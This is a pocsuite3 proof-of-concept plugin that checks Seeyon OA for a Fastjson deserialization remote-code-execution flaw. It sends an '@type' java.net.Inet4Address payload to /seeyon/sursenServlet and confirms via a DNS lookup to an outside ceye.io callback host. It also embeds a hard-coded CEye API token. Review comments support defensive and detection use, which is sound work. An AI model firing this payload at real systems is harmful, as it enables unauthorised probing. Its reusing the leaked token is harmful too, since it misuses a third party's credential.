"""Pocsuite3 verification plugin for the Seeyon OA Fastjson deserialization issue.

Development guide:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
More information: http://pocsuite.org

The plugin only verifies; it does not define an attack mode. Verification is
out-of-band: one POST is sent to ``/seeyon/sursenServlet`` and the CEye
DNS-log service is then asked whether a lookup for a per-run random label
was recorded.

Traffic this check produces, for anyone writing detections: a form POST to
``/seeyon/sursenServlet`` whose ``sursenData`` value contains an ``@type``
key, and (presumably only on an affected host) a DNS query for a name under
``ceye.io``.
"""
from urllib.parse import urljoin

from pocsuite3.api import Output, POCBase, register_poc, logger, requests
from pocsuite3.lib.utils import random_str
from pocsuite3.modules.ceye import CEye


class DemoPOC(POCBase):
    """Plugin metadata plus the DNS-log based verification routine."""

    vulID = '99116'  # ssvid
    version = '3.0'
    author = ['']
    vulDate = '2021-1-27'
    createDate = '2021-1-27'
    updateDate = '2021-1-27'
    references = ['']
    name = 'Seeyon OA Fastjson Deserialize'
    appPowerLink = ''
    appName = 'Seeyon OA'
    appVersion = ''
    vulType = 'RCE'
    # English: "Seeyon OA Fastjson deserialization". Runtime metadata, kept as published.
    desc = ''' 致远OA Fastjson反序列化 '''
    samples = []
    install_requires = ['']

    def check(self):
        """Send the probe and report whether CEye recorded the DNS lookup.

        Returns:
            bool: True when ``CEye.verify_request`` reports a DNS record for
            this run's random label, False otherwise.
        """
        # A fresh label per run, so a hit can be tied to this request.
        label = random_str(6)
        # NOTE(review): the CEye identifier is hard-coded, so every run
        # reports to the plugin author's CEye account and discloses the
        # lookup (and thereby the tested host's resolver) to a third party.
        callback_host = "{}.j3170ioc.ceye.io".format(label)

        endpoint = urljoin(self.url, '/seeyon/sursenServlet')
        request_headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Encoding': 'gzip, deflate'
        }
        # The JSON names java.net.Inet4Address as its type; presumably an
        # affected parser resolves ``val``, and that lookup is the only
        # signal this check relies on.
        body = 'sursenData={"rand2":{"@type":"java.net.Inet4Address","val":"%s"}}' % callback_host

        logger.info("ceye check key: {} for {}".format(label, self.url))
        # The HTTP response is not inspected; only the DNS log decides.
        requests.post(endpoint, data=body, headers=request_headers)

        # NOTE(review): API token committed in source. Treat it as disclosed;
        # rotate it and load it from configuration instead of the plugin body.
        dns_log = CEye(token='5df9bef9ed0d27df6f8csc1452b99b5b2p')
        return bool(dns_log.verify_request(label, type='dns'))

    def _verify(self):
        """Run ``check`` and turn its outcome into a pocsuite3 ``Output``."""
        result = {}
        try:
            confirmed = self.check()
        except Exception as e:
            # NOTE(review): any error (unreachable host, CEye failure) is
            # logged and then reported as "target is not vulnerable", so a
            # failed run reads the same as a clean result.
            logger.error(str(e))
        else:
            if confirmed:
                result['VerifyInfo'] = {'URL': self.url}
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if not result:
            output.fail('target is not vulnerable')
            return output
        output.success(result)
        return output


register_poc(DemoPOC)
暂无临时解决方案
暂无官方解决方案
暂无防护方案